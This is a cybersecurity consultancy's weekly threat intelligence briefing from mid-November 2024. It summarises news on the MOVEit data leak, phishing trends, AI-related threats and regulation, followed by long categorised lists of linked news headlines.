Chris Inglis: Why cyber security success hinges on strategic choices, not just tech | SC Media
The trouble with identity in an increasingly fake world | SC Media
How Cloud Security Advances Help Future-Proof Resilience
Privileged Accounts, Hidden Threats: Why Privileged Access Security Must Be a Top Priority
Avoiding Common API Security Mistakes
Hackers Aren’t Cutting Back, Why is Your Security Budget?
Cross-Site Scripting: 2024's Most Dangerous Software
Cyber criminals hijack DNS to build stealth attack networks - Help Net Security
Unlocking the power of public data to make your security team faster and more effective | SC Media
Safeguarding the DNS through registries - Help Net Security
Red red team team: threat actors hire pentesters to test out ransomware effectiveness | SC Media
Weaponized pen testers are becoming a new hacker staple | CSO Online
5 Questions CISOs Should Be Asking Regarding DSPM
8 Security Risks Of Shared Email Accounts - Security Boulevard
Insights from Cohesity on cyber resilience as a technical team sport - SiliconANGLE
Eight essential steps to fortify cyber security after a breach | SC Media
The limits of AI-based deepfake detection - Help Net Security
Navigating NIST’s updated password rotation guidelines | TechRadar
How Can PR Protect Companies During a Cyber Attack?
We Need to Talk: Breaking up With Your SIEM Vendor | MSSP Alert
Other News
Severed subsea internet cables raise network security questions | ITPro
Cyber Security is Everyone’s Responsibility - Security Boulevard
8 Security Risks Of Shared Email Accounts - Security Boulevard
300 Drinking Water Systems in US Exposed to Disruptive, Damaging Hacker Attacks - SecurityWeek
Cross-Site Scripting: 2024's Most Dangerous Software
Weaponized pen testers are becoming a new hacker staple | CSO Online
Eight essential steps to fortify cyber security after a breach | SC Media
Telecom Cable Disruption Reported Between Finland and Germany - Nord News
Poor cyber hygiene enabled nearly 30% of cyber attacks last quarter | StateScoop
Cyber attack leaves Stop & Shop shelves empty 10 days before Thanksgiving - CBS News
6 Ways Your Computer Isn't as Secure as You Think
The rising tide of maritime cyberthreats in global trade | TechRadar
Nearly 90% of UK industrial firms hit by cyber attacks in past year - Drives&Controls
ICS Security: 145,000 Systems Exposed to Web, Many Industrial Firms Hit by Attacks - SecurityWeek
5 alarming Windows cyber security facts you probably don’t know
Cisco reveals top cyber security threats trends
Expert warns construction industry on costly ransomware attacks | Project Scotland
Australian government cyber security falls in global ranking | The Canberra Times | Canberra, ACT
Cyber security tips for the education sector | Education Business
Navigating the surge of cyber threats in global maritime
Thames Water Dismisses Claims on Cyber-Attacks | SC Media UK
Fortra Reports Alarming Increase In Abuse Of Cloudflare Services
Airplane cyber security: Past, present, future
70% of Hong Kong companies saw cyber attacks in 2024
Gambling and lottery giant disrupted by cyber attack, working to bring systems back online
CISA Director Jen Easterly to depart agency on January 20 | TechCrunch
Vulnerability Management
Microsoft beefs up Windows security with new recovery and patching features | TechCrunch
CWE top 25 most dangerous software weaknesses - Help Net Security
MITRE shares 2024's top 25 most dangerous software weaknesses
Vulnerabilities
Critical 9.8-rated VMware vCenter RCE bug under exploit • The Register
Warning: VMware vCenter and Kemp LoadMaster Flaws Under Active Exploitation
Microsoft Vulnerability Poses Risk To Domain Control
Critical RCE bug in VMware vCenter Server now exploited in attacks
Mystery Palo Alto Networks 0-day RCE now actively exploited • The Register
PAN-OS Firewall Vulnerability Under Active Exploitation – IoCs Released
Fortinet VPN Zero-Day Exploited in Malware Attacks Remains Unpatched: Report - SecurityWeek
Millions of WordPress sites potentially hijackable due to critical plugin bug | SC Media
Apple Releases Urgent Updates to Patch Actively Exploited Zero-Day Vulnerabilities
Chrome Security Update, Fix For Multiple Vulnerabilities
Ubuntu Linux impacted by decade-old 'needrestart' flaw that gives root
Fortinet VPN design flaw hides successful brute-force attacks
Microsoft pauses Exchange security updates over buggy patch • The Register
Microsoft Pulls Exchange Patches Amid Mail Flow Issues
Security plugin flaw in millions of WordPress sites gives admin access
Oracle patches exploited Agile PLM vulnerability (CVE-2024-21287) - Help Net Security
Linux Variant of Helldown Ransomware Targets VMware
Exploitation Attempts Target Citrix Session Recording Vulnerabilities - SecurityWeek
Helldown ransomware exploits Zyxel VPN flaw to breach networks
NSO Group used another WhatsApp zero-day after being sued, court docs say
D-Link urges users to retire VPN routers impacted by unfixed RCE flaw
Sector Specific
Industry-specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 15 November 2024
Black Arrow Cyber Threat Intelligence Briefing 15 November 2024:
-Massive MOVEit Vulnerability Breach: Hacker Leaks Employee Data from Amazon, McDonald’s, HSBC, HP, and Potentially 1000+ Other Companies
-Phishing Attacks Surge in 2024 as Cyber Criminals Adopt AI Tools and Multi-Channel Tactics
-Critical Vulnerabilities Persist in Finance and Insurance Sectors
-AI-Based Attacks Top Gartner’s List of Emerging Threats – Again
-Here Are the Top 10 Passwords for 2024, and They're All Embarrassing
-Mishing: The Rising Mobile Attack Vector Facing Every Organisation
-80% Of Surveyed Businesses Don’t Have Plans for an AI-Related Crisis
-BoE and Regulators Set Out Digital Rules to Cut Cyber Attack Risks
-Employees Are Hiding Their AI Use from Their Managers. Here's Why
-CISOs in 2025: Balancing Security, Compliance, and Accountability
-48% of Small Businesses Don’t Offer Cyber Security Training
-Thousands of Employees Could be Falling Victim to Obvious Phishing Scams Every Month
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber-related news from the last week.
Top Cyber Stories of the Last Week
Massive MOVEit Vulnerability Breach: Hacker Leaks Employee Data from Amazon, McDonald’s, HSBC, HP, and Potentially 1000+ Other Companies
A recent massive data breach exploiting a vulnerability in MOVEit file transfer software has exposed sensitive employee data from major companies globally. This incident is one of the largest corporate information leaks, affecting sectors such as finance, healthcare, technology, and retail. The breach resulted in detailed employee records being stolen from 25 leading organisations, including Amazon with over 2.8 million records and MetLife with over 585,000 records. The leaked data includes names, email addresses, phone numbers, and organisational structures, posing significant risks for phishing and identity theft. This incident highlights the critical importance of promptly applying security patches and reinforces the need for robust cyber security measures to protect sensitive corporate data.
Phishing Attacks Surge in 2024 as Cyber Criminals Adopt AI Tools and Multi-Channel Tactics
A recent report has found that phishing attacks surged by 28% in Q2 2024, with cyber criminals adopting AI tools and multi-channel tactics. Organisations with over 2,000 employees now face approximately 36 phishing emails per day, overwhelming security systems. There was a 52.2% increase in phishing attacks that bypass secure email gateways, using techniques like QR codes, deepfakes, and HTML smuggling. Payloadless attacks (phishing without links or attachments, instead using social engineering to deceive victims) have risen to nearly 19% of phishing attempts in 2024, up from 5.4% in 2021. Businesses must enhance security measures and foster awareness to combat these sophisticated threats.
Critical Vulnerabilities Persist in Finance and Insurance Sectors
Cyber security provider Black Duck has found that the finance and insurance sectors have the highest number of critical vulnerabilities, with small sites averaging 565 and medium sites 580. Healthcare and social assistance follow closely behind. The most critical issues identified were cryptographic failures and injection vulnerabilities, totalling over 34,800 instances. These weaknesses threaten sensitive data like personally identifiable information and financial records, posing significant business risks. The mean time to remediate varies, with finance addressing issues in 28 days due to strict regulations, while utilities take up to 107 days. Widespread security misconfigurations affect 98% of applications, endangering business continuity and service availability.
AI-Based Attacks Top Gartner’s List of Emerging Threats – Again
Gartner reports that AI-based threats remain the top emerging cyber risks for organisations, with 80% of surveyed executives highlighting AI-enhanced malicious attacks as a major concern. This marks the third consecutive quarter where AI leads in risk rankings. The difficulty in finding skilled AI and cyber security talent is prompting companies to turn to Managed Security Service Providers (MSSPs) for assistance. MSSPs are leveraging AI to combat sophisticated cyber attacks, and over 80% now offer AI-related security services. This represents a significant shift as enterprises struggle to protect themselves against increasingly complex AI-driven threats.
Here Are the Top 10 Passwords for 2024, and They're All Embarrassing
NordPass, in collaboration with NordStellar, has found that weak passwords remain a significant security risk for organisations and individuals alike. Their sixth annual report revealed that '123456' is the most common password globally, used by over 3 million personal users and more than 1.2 million corporate users. The report highlighted that despite increased awareness of password security, it takes less than a second to crack these widely used passwords. Nearly all organisations still face password management challenges, with many employees reusing simple passwords across accounts. The study underscores the need for stronger password practices, including adopting password managers.
Mishing: The Rising Mobile Attack Vector Facing Every Organisation
Recent research highlights that mobile-targeted phishing attacks, collectively termed "mishing", are an escalating threat to organisations. The widespread use of mobile devices for accessing sensitive data has made them prime targets for cyber criminals employing tactics like smishing, vishing and quishing. These attacks exploit unique mobile features, increasing user vulnerability. Despite this rising threat, many organisations lack adequate mobile security measures and underestimate the associated risks. To combat mishing, it is imperative for organisations to implement comprehensive mobile threat defences and educate employees on recognising and avoiding such attacks.
80% Of Surveyed Businesses Don’t Have Plans for an AI-Related Crisis
Riskonnect's recent report highlights that 80% of organisations lack a dedicated plan to address generative AI risks, including AI-driven fraud attacks. Among surveyed professionals, 72% reported that cyber security risks are having a significant or severe impact on their organisations (an increase from last year's 47%) and 24% believe AI-powered cyber security threats will have the biggest impact over the next 12 months. Despite growing concerns over AI ethics, privacy, and security, 65% of companies have not established policies governing the use of generative AI by partners and suppliers, leaving critical risk management gaps unaddressed.
BoE and Regulators Set Out Digital Rules to Cut Cyber Attack Risks
The Bank of England and UK financial regulators have introduced new rules to enhance IT resilience in financial firms, aiming to reduce risks from cyber attacks and power outages. Effective from 1 January next year, these measures require critical third-party providers to report major incidents and conduct resilience testing. While these providers boost competitiveness, reliance on a few increases systemic risk, potentially affecting consumers and the UK's financial stability. Regulators stress that firms remain accountable for operational resilience, underscoring the need to manage disruption risks to uphold the UK's reputation for stable financial services.
Employees Are Hiding Their AI Use from Their Managers. Here's Why
New research from Slack reveals that enthusiasm for artificial intelligence among employees is waning, with excitement dropping from 47% to 41% globally. Nearly half of desk workers feel uncomfortable with their managers knowing they use AI for common tasks, fearing perceptions of laziness or incompetence. Despite 99% of executives planning to invest in AI this year, a significant skills gap persists, with 61% of employees spending less than five hours learning to use AI tools. The report highlights the need for clear policies and training to address uncertainties and fully harness AI's potential.
CISOs in 2025: Balancing Security, Compliance, and Accountability
Recent regulatory changes, including new SEC and NYDFS rules in the US, have heightened CISO accountability by requiring rapid incident disclosures and increasing personal liability. This intensifies pressures on CISOs, making the role less attractive due to potential legal repercussions and heightened stress. Looking ahead to 2025, CISOs will need advanced skills in strategic communication, risk management, and understanding emerging technologies like AI. Top priorities now include optimising existing security investments, enhancing defences against AI-driven cyber attacks, and investing in advanced cloud security capabilities.
48% of Small Businesses Don’t Offer Cyber Security Training
Recent research has revealed that 48% of UK small businesses do not provide cyber security awareness training to employees. Cyber threats are increasing in volume and complexity, particularly with the rise of AI, yet nearly half (47%) lack up-to-date anti-virus software and 15% have no firewall protection. 81% do not have a valid disaster recovery plan, and 29% have no patch management in place. With 2.39 million businesses experiencing cyber crime in the last 12 months, there is a clear need for businesses to improve their cyber security stance, both technologically and through employee awareness.
Thousands of Employees Could be Falling Victim to Obvious Phishing Scams Every Month
Cyber security provider Netskope has found that phishing attacks are a significant threat in the banking sector, with three in every 1,000 employees clicking on phishing links each month. This equates to over 1,000 banking workers in the UK potentially compromising security monthly. Russian criminal groups are identified as the most active attackers.
Sources:
https://www.helpnetsecurity.com/2024/11/15/finance-industry-vulnerabilities/
https://www.msspalert.com/news/ai-based-attacks-top-gartners-list-of-emerging-threats-again
https://www.zimperium.com/blog/mishing-the-rising-mobile-attack-vector-facing-every-organization/
https://www.zdnet.com/article/employees-are-hiding-their-ai-use-from-their-managers-heres-why/
https://www.helpnetsecurity.com/2024/11/13/daniel-schwalbe-domaintools-cisos-2025/
Governance, Risk and Compliance
48% of small businesses don’t offer cyber security training
Failed security controls cost businesses billions
BoE and regulators set out digital rules to cut cyber-attack risks – Mortgage Strategy
CISOs in 2025: Balancing security, compliance, and accountability - Help Net Security
Steps Organisations Can Take to Improve Cyber Resilience - Security Boulevard
It’s a Hard Time to Be a CISO. Transformational Leadership Is More Imp - Infosecurity Magazine
How cyber security failures are draining business budgets - Help Net Security
The ROI of Security Investments: How Cyber Security Leaders Prove It
Maximizing cyber security ROI: Best practices for CISOs today | TechRadar
Crum & Forster Introduces Professional Liability Insurance for Chief Information Security Officers
Why Future-proofing Cyber Security Regulatory Frameworks Is Essential
Ambitious cyber security regulations leave companies in compliance chaos - Help Net Security
Threats
Ransomware, Extortion and Destructive Attacks
Scattered Spider, BlackCat criminals claw back • The Register
Critical Veeam RCE bug now used in Frag ransomware attacks
Tackling ransomware without banning ransom payments | TechRadar
The Role of Threat Intelligence in Preventing Ransomware - Security Boulevard
To Pay or Not to Pay: The Ransomware Dilemma - Security Boulevard
OpenText reveals 2024 nastiest malware, LockBit leads list
WHO, 50 countries warn United Nations of increasing ransomware attacks against hospitals - The Hindu
New Ymir ransomware partners with RustyStealer in attacks
5 BCDR Oversights That Leave You Exposed to Ransomware
Cloud Ransomware Flexes Fresh Scripts Against Web Apps
New ShrinkLocker ransomware decryptor recovers BitLocker password
Idaho Man Turns to RaaS to Extort Orthodontist
Ransomware Victims
Cyber Attack Cost Oil Giant Halliburton $35 Million - SecurityWeek
Embargo ransomware claims breach of US pharmacy network • The Register
Phishing & Email Based Attacks
Thousands of employees could be falling victim to obvious phishing scams every month | TechRadar
Mishing: The Rising Mobile Attack Vector Facing Every Organisation - Zimperium
Man gets 10 years for stealing $20M in nest eggs from 400 US home buyers - Ars Technica
New Wave Of Phishing Attacks Exploits Microsoft Visio Files For Two-Step Credential Theft
Most prolific phishing campaign of 2024 | Professional Security Magazine
This new phishing strategy utilizes GitHub comments to distribute malware | TechRadar
Microsoft Exchange adds warning to emails abusing spoofing flaw
If You Fall for a Phishing Email, Here’s What Happens Next
I Almost Fell For a Phishing Scam: Here’s What Happened
Other Social Engineering
Mishing: The Rising Mobile Attack Vector Facing Every Organisation - Zimperium
Winter Fuel Payment Scam Targets UK Citizens Via SMS | Tripwire
Scammers target UK senior citizens with Winter Fuel Payment texts
Pensioners Warned Over Winter Fuel Payment Scam Texts - Infosecurity Magazine
Malware being delivered by mail, warns Swiss cyber agency
North America sees social engineering scams multiply by a factor of 10
The terrifying Google Maps tactic now used by email scammers | Tech News | Metro News
Artificial Intelligence
AI-Based Attacks Top Gartner’s List of Emerging Threats – Again | MSSP Alert
Execs identify AI-driven cyber attacks as top security threat | SC Media
Employees are hiding their AI use from their managers. Here's why | ZDNET
HackerOne: 48% of Security Professionals Believe AI Is Risky
Hackers Are Using AI Against You: Here Is How To Protect Yourself
3 key generative AI data privacy and security concerns | TechTarget
80% Of Surveyed Businesses Don’t Have Plans For An AI-Related Crisis
Risk of AI in CIISec survey | Professional Security Magazine
AI Threat to Escalate in 2025, Google Cloud Warns - Infosecurity Magazine
Inside The Duality of AI's Superpowers
Enterprises look to AI to bridge cyber skills gap — but will still fall short | CSO Online
How CISOs Can Lead the Responsible AI Charge
Organisations face mounting pressure to accelerate AI plans, despite lack of ROI | ZDNET
Google Warns of Rising Cloaking Scams, AI-Driven Fraud, and Crypto Schemes
How to ward-off fraudulent job seekers propped up by AI | SC Media
Sticker shock: Are enterprises growing disillusioned with AI? | ZDNET
Malware
AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services
ESET shines light on cyber criminal RedLine empire | Computer Weekly
Cyber Criminals Use Excel Exploit to Spread Fileless Remcos RAT Malware
Hackers now use ZIP file concatenation to evade detection
Hackers Abusing Google Ads To Deliver Fakebat Malware
Sophisticated Infostealers Top Malware Rankings
Hive0145 Targets Europe with Advanced Strela Stealer Campaigns - Infosecurity Magazine
New Glove Stealer malware bypasses Chrome's cookie encryption
This devious new malware is going after macOS users with a whole barrel of tricks | TechRadar
Hello again, FakeBat: popular loader returns after months-long hiatus | Malwarebytes
OpenText reveals 2024 nastiest malware, LockBit leads list
Watch out, that Excel document could be infected with dangerous malware | TechRadar
‘Top 10’ malware strain, Remcos RAT, now exploiting Microsoft Excel files | SC Media
Volt Typhoon rebuilds malware botnet following FBI disruption
North Korean hackers create Flutter apps to bypass macOS security
Malware being delivered by mail, warns Swiss cyber agency
This new phishing strategy utilizes GitHub comments to distribute malware | TechRadar
MacBook Pro Owners Warned As 99 New Security Problems Reported
New Ymir ransomware partners with RustyStealer in attacks
TA455’s Iranian Dream Job Campaign Targets Aerospace with Malware - Infosecurity Magazine
Bots/Botnets
AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services
Volt Typhoon rebuilds malware botnet following FBI disruption
Mobile
Mishing: The Rising Mobile Attack Vector Facing Every Organisation - Zimperium
Apple indeed added a feature called "inactivity reboot" in iOS 18.1 that reboots locked devices
6 telltale signs that your Android phone has malware
US Gov Agency Urges Employees to Limit Phone Use After China ‘Salt Typhoon’ Hack - SecurityWeek
NatWest blocks bevy of messenger apps on staff devices • The Register
Google Confirms $1 Trillion AI Security Protection For Pixel Users
This Pixel phone feature listens in on calls to protect you from scams | ZDNET
Denial of Service/DoS/DDoS
Credit cards readers across Israeli stores crash in DDoS cyber attack - The Jerusalem Post
DDoS Attacks Targeting ISPs are Different – Here’s How - Security Boulevard
'Cyber attack' council in Tewkesbury working to ease backlog - BBC News
What will carpet bomb attacks mean for security teams in 2025? - Tech Monitor
Internet of Things – IoT
AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services
Burglars are jamming Wi-Fi security cameras. Here's what you can do | PCWorld
Unpatched Vulnerabilities Allow Hacking of Mazda Cars: ZDI - SecurityWeek
Data Breaches/Leaks
Here's what we know about the Snowflake data theft suspects • The Register
Amazon MOVEit Leaker Claims to Be Ethical Hacker - Infosecurity Magazine
Major cyber attacks and data breaches of 2024 - Security Boulevard
Debt Relief Firm Forth Discloses Data Breach Impacting 1.5 Million People - SecurityWeek
200,000 SelectBlinds customers have their cards skimmed in malware attack
Not to alarm you, but your Social Security number is already leaked | The Independent
300,000 Patients Impacted By Law Firm Data Breach
Business records on 100M+ people swiped, put up for sale • The Register
Leaked info of 122 million linked to B2B data aggregator breach
Embargo ransomware claims breach of US pharmacy network • The Register
Misconfigured Microsoft Power Pages could lead to data breaches
HIBP notifies 57 million people of Hot Topic data breach
Organised Crime & Criminal Actors
Scattered Spider, BlackCat criminals claw back • The Register
US Prison Sentences for Nigerian Cyber Criminals Surge in Recent Months - SecurityWeek
How Global Threat Actors May Respond to a Second Trump Term
Here's what we know about the Snowflake data theft suspects • The Register
ESET shines light on cyber criminal RedLine empire | Computer Weekly
Crypto CEO safe after being kidnapped and held for $1 million ransom | Fortune Crypto
Charges Unsealed for Alleged Hackers of Snowflake Customers
World Economic Forum calls for joint efforts to counter cyber threats - World - DAWN.COM
WEF Launches New Framework to Combat Cyber Crime - Infosecurity Magazine
Cyber crook devoid of boundaries gets 10-year prison stint • The Register
Bitfinex Hacker Sentenced to 5 Years, Guilty of Laundering $10.5 Billion in Bitcoin
What To Know About Cyber Criminal Ross Ulbricht And His Possible Release Under Trump
FBI Warns US Organisations of Fake Emergency Data Requests Made by Cyber Criminals - SecurityWeek
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Bitcoin Fog Founder Sentenced to 12 Years for Cryptocurrency Money Laundering
Criminal crypto launderer gets 12.5 years in prison • The Register
Crypto CEO safe after being kidnapped and held for $1 million ransom | Fortune Crypto
Bitfinex Hacker Sentenced to 5 Years, Guilty of Laundering $10.5 Billion in Bitcoin
Google Warns of Rising Cloaking Scams, AI-Driven Fraud, and Crypto Schemes
Insider Risk and Insider Threats
Guardsman gets 15 years after leaking secret info on Discord • The Register
Redefining Cyber Resilience: Calculating the Human Factor | MSSP Alert
Insurance
Crum & Forster Introduces Professional Liability Insurance for Chief Information Security Officers
Supply Chain and Third Parties
BoE and regulators set out digital rules to cut cyber-attack risks – Mortgage Strategy
NIST publishes guide on due diligence for cyber supply chain risk management – DataBreaches.Net
Millions of records from MOVEit hack released on dark web | SC Media
Amazon MOVEit Leaker Claims to Be Ethical Hacker - Infosecurity Magazine
Single points of failure breed systemic risk to national security | SC Media
300,000 Patients Impacted By Law Firm Data Breach
Bank of England U-turns on Vulnerability Disclosure Rules - Infosecurity Magazine
Cloud/SaaS
AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services
5 Ways to Save Your Organisation From Cloud Security Threats
Strategies for CISOs navigating hybrid and multi-cloud security - Help Net Security
Outages
Single points of failure breed systemic risk to national security | SC Media
Microsoft investigates OneDrive issue causing macOS app freezes
Identity and Access Management
Identity Security Is The Cornerstone Of Modern Cyber Defence
Machine Identities Outnumber Human Ones: 69% Of Companies Face Rising Security Risks
Embracing The Future Of Cryptography And Identity Management
Encryption
Quantum cyber risk – securing tomorrow | BCS
Embracing The Future Of Cryptography And Identity Management
Linux and Open Source
Open Source Security Incidents Aren't Going Away
Passwords, Credential Stuffing & Brute Force Attacks
Here Are the Top 10 Passwords for 2024, and They're All Embarrassing - CNET
The true (and surprising) cost of forgotten passwords
Social Media
TikTok Pixel Privacy Nightmare: A New Case Study
Instagram purportedly subjected to widespread data scraping | SC Media
South Korea Fines Meta $15.7 Million For Collecting User Data - IT Security Guru
Malvertising
Hackers Abusing Google Ads To Deliver Fakebat Malware
Training, Education and Awareness
48% of small businesses don’t offer cyber security training
Cyber Security Education Needs a Team: Better Partner Up!
Regulations, Fines and Legislation
BoE and regulators set out digital rules to cut cyber-attack risks – Mortgage Strategy
CISOs in 2025: Balancing security, compliance, and accountability - Help Net Security
Preparing for DORA Amidst Technical Controls Ambiguity
GDPR landscape | Professional Security Magazine
More Spyware, Fewer Rules: What Trump’s Return Means for US Cyber Security | WIRED
How the Trump Administration May Reshape Security, Privacy
US doubles down support for UN cyber crime treaty | SC Media
Will cyber suffer under Trump’s goal to slash federal budgets? - Government Executive
Why Future-proofing Cyber Security Regulatory Frameworks Is Essential
Bank of England U-turns on Vulnerability Disclosure Rules - Infosecurity Magazine
Ambitious cyber security regulations leave companies in compliance chaos - Help Net Security
Washington's Cyber Security Storm of Complacency
Models, Frameworks and Standards
Preparing for DORA Amidst Technical Controls Ambiguity
NIST publishes guide on due diligence for cyber supply chain risk management – DataBreaches.Net
GDPR landscape | Professional Security Magazine
NIST says exploited vulnerability backlog cleared but end-of-year goal for full list unlikely
Data Protection
South Korea Fines Meta $15.7 Million For Collecting User Data - IT Security Guru
Careers, Working in Cyber and Information Security
Veterans’ military skills can help them fill cyber vacancies, State official says - Nextgov/FCW
Has the Cyber Security Workforce Peaked?
4 reasons why veterans thrive as cyber security professionals - Help Net Security
How Generative AI Will Change Jobs In Cyber Security
Tips for a successful cyber security job interview - Help Net Security
Law Enforcement Action and Take Downs
Scattered Spider, BlackCat criminals claw back • The Register
Bitcoin Fog Founder Sentenced to 12 Years for Cryptocurrency Money Laundering
Here's what we know about the Snowflake data theft suspects • The Register
iPhones Seized by Cops Are Rebooting, and No One’s Sure Why
Man gets 10 years for stealing $20M in nest eggs from 400 US home buyers - Ars Technica
Charges Unsealed for Alleged Hackers of Snowflake Customers
Apple indeed added a feature called "inactivity reboot" in iOS 18.1 that reboots locked devices
New iOS Security Feature Reboots Devices to Protect User Data: Reports - SecurityWeek
Cyber crook devoid of boundaries gets 10-year prison stint • The Register
Bitfinex Hacker Sentenced to 5 Years, Guilty of Laundering $10.5 Billion in Bitcoin
Misinformation, Disinformation and Propaganda
German interior minister warns of cyber threat ahead of elections
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
China’s Hacker Army Outshines America | Miami Herald
CISA, FBI Confirm China Hacked Telecoms Providers for Spying - SecurityWeek
Massive Telecom Hack Exposes US Officials to Chinese Espionage - Infosecurity Magazine
China-linked hackers stole surveillance data from telecom companies, US says | Reuters
Toolkit Vastly Expands APT41's Surveillance Powers
Nation State Actors
China
China’s Hacker Army Outshines America | Miami Herald
Chinese hacking effort is far more pervasive than previously reported, sources say - ABC News
US Gov Agency Urges Employees to Limit Phone Use After China ‘Salt Typhoon’ Hack - SecurityWeek
Volt Typhoon rebuilds malware botnet following FBI disruption
CISA, FBI Confirm China Hacked Telecoms Providers for Spying - SecurityWeek
Massive Telecom Hack Exposes US Officials to Chinese Espionage - Infosecurity Magazine
Breaking Down Earth Estries Persistent TTPs in Prolonged Cyber Operations | Trend Micro (US)
Toolkit Vastly Expands APT41's Surveillance Powers
TikTok Pixel Privacy Nightmare: A New Case Study
Russia
How a Windows zero-day was exploited in the wild for months (CVE-2024-43451) - Help Net Security
German interior minister warns of cyber threat ahead of elections
Households should keep enough cash on hand for three days, BoF says | Yle News | Yle
Pro-Russia Hackers Ramp Up Cyber Attacks on South Korea, Presidential Office Says - The Moscow Times
Iran
Adversarial advantage: Using nation-state threat analysis to strengthen US cyber security
TA455’s Iranian Dream Job Campaign Targets Aerospace with Malware - Infosecurity Magazine
Credit cards readers across Israeli stores crash in DDoS cyber attack - The Jerusalem Post
North Korea
North Korean hackers create Flutter apps to bypass macOS security
Lazarus Group Uses Extended Attributes for Code Smuggling in macOS - Infosecurity Magazine
Pro-Russian Groups Target South Korea as North Korea Joins Ukraine - Infosecurity Magazine
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
1,400 Pegasus spyware infections detailed in WhatsApp’s lawsuit filings
More Spyware, Fewer Rules: What Trump’s Return Means for US Cyber Security | WIRED
Tools and Controls
48% of small businesses don’t offer cyber security training
Failed security controls cost businesses billions
The Role of Threat Intelligence in Preventing Ransomware - Security Boulevard
Identity Security Is The Cornerstone Of Modern Cyber Defence
Steps Organisations Can Take to Improve Cyber Resilience - Security Boulevard
How cyber security failures are draining business budgets - Help Net Security
Maximizing cyber security ROI: Best practices for CISOs today | TechRadar
API Security in Peril as 83% of Firms Suffer Incidents - Infosecurity Magazine
Machine Identities Outnumber Human Ones: 69% Of Companies Face Rising Security Risks
Improve Your Organisation’s Data Security Posture- IT Security Guru
New iOS Security Feature Reboots Devices to Protect User Data: Reports - SecurityWeek
Cyber security network to make the UK safer and more resilient – UKRI
How Generative AI Will Change Jobs In Cyber Security
The ROI of Security Investments: How Cyber Security Leaders Prove It
Leveraging Threat Intelligence Feeds for Proactive Cyber Defence
80% Of Surveyed Businesses Don’t Have Plans For An AI-Related Crisis
Embracing The Future Of Cryptography And Identity Management
Redefining Cyber Resilience: Calculating the Human Factor | MSSP Alert
Experts Uncover 70,000 Hijacked Domains in Widespread 'Sitting Ducks' Attack Scheme
How Developers Drive Security Professionals Crazy
EU Ramps Up Cyber Resilience with Major Crisis Simulation Exercise - Infosecurity Magazine
Adversarial advantage: Using nation-state threat analysis to strengthen US cyber security
Enterprises look to AI to bridge cyber skills gap — but will still fall short | CSO Online
Dependency Management is Critical for Disaster Recovery After a Security Incident | HackerNoon
5 BCDR Oversights That Leave You Exposed to Ransomware
Half of businesses now using AI for cyber security | theHRD
Bank of England U-turns on Vulnerability Disclosure Rules - Infosecurity Magazine
O2’s AI Granny Outsmarts Scam Callers with Knitting Tales - Infosecurity Magazine
This Pixel phone feature listens in on calls to protect you from scams | ZDNET
Other News
Moody's Rating adds telecoms, airlines, utilities to highest risk category | CyberScoop
Ticketmaster Hackers Are Stealing Tickets Out of Customers' Accounts - Business Insider
Households should keep enough cash on hand for three days, BoF says | Yle News | Yle
More Spyware, Fewer Rules: What Trump’s Return Means for US Cyber Security | WIRED
These three critical sectors are riddled with high-risk vulnerabilities | ITPro
NIST report on hardware security risks reveals 98 failure scenarios - Help Net Security
Google Chrome Warning—New Drive-By Cyber Attack, No 0-Day Needed
Council Cyber Attacks: A Growing Issue | SC Media UK
How Global Threat Actors May Respond to a Second Trump Term
How Fintechs and Financial Institutions Can Demonstrate Resiliency: By Prakash Pattni
5 Must-Have Cyber Security Best Practices for Fintech Startups: By Sheza Gary
Looking to the skies: The importance of satellite cyber security | United States Studies Centre
Cyber security network to make the UK safer and more resilient – UKRI
Understanding the Cyber Criminal Mindset: Protecting Your School’s Data | Edexec
Could Cyber Expertise Aid Education in the Form of Governors? | SC Media UK
Automotive Safety and Security from the Bottom of the Stack
Cyber resilience takes centre stage at rail industry conference in London - Global Railway Review
Spray and pray: the cyber criminal tactic hurting shipping | TradeWinds
Vulnerability Management
Zero-days dominate top frequently exploited vulnerabilities - Help Net Security
Five Eyes nations reveal the top 15 most exploited flaws • The Register
NIST says exploited vulnerability backlog cleared but end-of-year goal for full list unlikely
NCSC on cyber threat landscape | Professional Security Magazine
Outdated PCs are Holes in Your Cyber Security Armor | Dell USA
Vulnerabilities
Microsoft Patch Tuesday security updates for November 2024 fix two actively exploited zero-days
HPE Patches Critical Vulnerabilities in Aruba Access Points - SecurityWeek
Veeam Patches High-Severity Vulnerability as Exploitation of Previous Flaw Expands - SecurityWeek
Patch Tuesday: Critical Flaws in Adobe Commerce, Photoshop, InDesign, Illustrator - SecurityWeek
Citrix Issues Patches for Zero-Day Recording Manager Bugs
Exploit code released for RCE attack on Citrix VDI solution • The Register
Palo Alto Advises Securing PAN-OS Interface Amid Potential RCE Threat Concerns
Critical Veeam RCE bug now used in Frag ransomware attacks
Fortinet Releases Security Updates for Multiple Products | CISA
Ivanti Patches 50 Vulnerabilities Across Several Products - SecurityWeek
